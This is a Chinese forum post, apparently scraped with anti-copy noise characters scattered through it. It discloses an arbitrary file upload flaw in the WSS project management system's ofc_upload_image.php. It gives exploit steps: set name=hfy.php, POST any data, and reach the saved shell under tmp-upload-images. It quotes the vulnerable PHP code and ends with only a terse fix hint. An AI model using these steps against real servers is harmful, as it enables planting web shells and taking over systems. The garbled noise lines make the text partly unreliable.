WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
! S9 l5 }9 q2 [. D2 o! z
利用：
, T$ D. B! v) i) {8 O+ \/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
# N+ y. Q- x0 ]/ K
Post任意数据
3 D  D; k3 A0 }1 a4 U保存位置http://localhost/chart/tmp-upload-images/hfy.php
  }7 J) {- U7 T2 v; ~0 k0 p

最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~
( H$ t+ [8 L' [9 x) n5 D/ X
4 G# G6 ~* I% d! ~. y5 w<?php

. z/ H* T0 i0 s2 [//
4 Y% A) P( [: t// In Open Flash Chart -> save_image debug mode, you
5 Y9 }. z! S4 \0 O/ d& K// will see the 'echo' text in a new window.
//
1 P* x5 o! l: ]! {2 G
7 N  \) N0 U+ _: B/*

print_r( $_GET );
  d. x' V; j% a- ]$ wprint_r( $_POST );
6 Y" u7 H" I# t5 j7 {4 Q( i! `print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
; T  b: I. s, u1 |* H/ m// default path for the image to be stored //
, L3 z' R. U) e# x  N$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);
! W" x) R1 W% P; [, V
// full path to the saved image including filename //
6 I1 U- G6 a+ k+ ^9 L$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
0 O2 Y8 R: J7 a5 L// print_r( $_POST );
6 p1 j; w( `" o) q9 R1 r" M// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
# \/ @6 C5 f/ i9 C3 w
+ K' P0 A# B6 `! U//
8 Q$ l% @6 s5 \  ]- }7 x7 ?7 Y// POST data is usually string data, but we are passing a RAW .png
3 _$ P  v- z. H( _' h. y. h" N. P// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
$ v1 u! {8 u! C1 H( H3 V( N6 r//
. O) T  J/ P$ j6 ^" P. m, E; X
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

% A) \; B  I8 x) H- M//
& D/ j' Q7 Z' b4 j0 @, [# F" u// LOOK:
; V  a/ c7 M7 w7 l( R4 O+ ~//
) G. n+ d( |* N; T! V  J: Sexit();
1 H7 B9 e$ H1 r/ R1 o7 ?' K//
! G- G% u0 \* g" A' {1 M// PHP5:
/ @% k9 V" @5 Z* W5 s2 U, I//
5 J+ \5 r7 k" Q- I7 g7 V0 D

5 t0 H* w% R1 e8 M1 J! q// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
0 {8 j- [$ d7 h0 K} else {
4 D- Y4 m# i: k    echo "FILE UPLOAD FAILED";
9 X0 w' j! c7 K5 X9 w}
  z# s, s+ y  H7 M; {3 B
/ b1 [. K; q6 I* e) r5 B- u
1 f8 g+ {* o/ Y" I, A" L: S?>
4 c, `7 Y# \+ _" H
1 y( T0 _# B" {" c
* ?2 C' L) i& M
, w4 _; S& t, e1 \


% f3 p3 s2 e8 ~8 w+ e/ i" g修复方案：
& T' Y8 l5 Q1 T6 S这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞
( B' \. Y5 d# x2 o, g
" W  M' J: U/ j& ~3 ^2 [
) ~8 c( q& M; S8 k  Q% t